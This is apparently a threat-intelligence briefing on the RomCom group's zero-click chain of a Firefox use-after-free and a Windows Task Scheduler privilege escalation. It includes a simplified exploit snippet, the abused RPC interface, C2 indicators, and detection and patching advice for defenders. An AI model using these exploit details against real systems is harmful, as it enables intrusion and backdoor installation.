Summary for Security Leadership
The Russia-aligned RomCom APT group (also tracked as Storm-0978 or UNC2596) has been observed chaining two zero-day vulnerabilities—CVE-2024-9680 (Mozilla Firefox) and CVE-2024-49039 (Windows Task Scheduler)—to deploy its backdoor without user interaction. This marks the group’s second known zero-day exploitation since mid-2023, demonstrating advanced capabilities in developing or acquiring stealthy attack vectors.
Key Takeaways
- Zero-click exploit: Combines Firefox RCE (CVSS 9.8) and Windows privilege escalation (CVSS 8.8)
- Delivery: Fake websites redirect to exploit servers, compromising victims browsing with vulnerable Firefox/Thunderbird/Tor Browser
- Impact: Installs RomCom backdoor capable of command execution and module downloads
- Patches: Mozilla fixed CVE-2024-9680 within 25 hours (October 9, 2024); Microsoft patched CVE-2024-49039 on November 12, 2024
- Targets: Primarily European and North American entities across government, defense, and private sectors
Technical Analysis of the Exploit Chain
Vulnerability Breakdown
CVE-2024-9680 (Firefox)
A use-after-free flaw in Firefox’s animation timeline feature allowed code execution in the browser’s restricted context. The exploit leveraged JavaScript heap manipulation to trigger memory corruption via AnimationTimeline::Tick methods, ultimately escaping sandbox restrictions.
CVE-2024-49039 (Windows)
An undocumented RPC endpoint (WPTaskScheduler.dll) permitted untrusted processes to create scheduled tasks. RomCom abused this to execute PowerShell scripts fetching secondary payloads from C2 servers like journalctd[.]live.
Exploitation Workflow
- Initial Access: Victims redirected from spoofed domains (e.g.,
redircorrectiv[.]com) to exploit servers - Firefox Exploit:
// Simplified exploit logic from ESET's analysis function triggerUseAfterFree() { const anim = new Animation(); anim.ready.then(() => { anim.cancel(); // Triggers UAF during Tick() iteration heapSpray(); }); } - Privilege Escalation: Loads
PocLowIL.dllto abuse Windows Task Scheduler via RPC calls to33D84484-3626-47EE-8C6F-E7E98B113BE1interface. - Payload Delivery: Downloads RomCom backdoor (SHA1:
ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6) to%PUBLIC%directory.
Relevance to Security Teams
For Defenders (Blue Teams)
- Detection: Monitor for process creation from
conhost.exewith hidden windows, or PowerShell fetching executables to public folders - IOCs:
Type Indicator Domain journalctd[.]liveIP 194.87.189.171(Aeza hosting)File PocLowIL.dll(sandbox escape)
For Offensive Teams (Red Teams)
RomCom’s exploit chain demonstrates viable techniques for bypassing browser sandboxes via privileged RPC endpoints.
Remediation and Mitigation
- Patch Immediately:
- Firefox/Thunderbird: Versions 131.0.2, 128.3.1 ESR
- Windows: Install KB5046612 (November 2024)
- Network Controls:
- Block traffic to known C2 IPs like
62.60.238.81 - Restrict outbound PowerShell to trusted endpoints
- Block traffic to known C2 IPs like
- User Training: Highlight risks of visiting unfamiliar domains, even if redirected from legitimate-looking URLs.
Conclusion
The RomCom campaign underscores the growing sophistication of APT groups in weaponizing zero-days for stealthy intrusions. Rapid patch deployment—as demonstrated by Mozilla’s 25-hour turnaround—remains critical to mitigating such threats. Organizations should prioritize monitoring for anomalous scheduled task creation and browser process behavior.
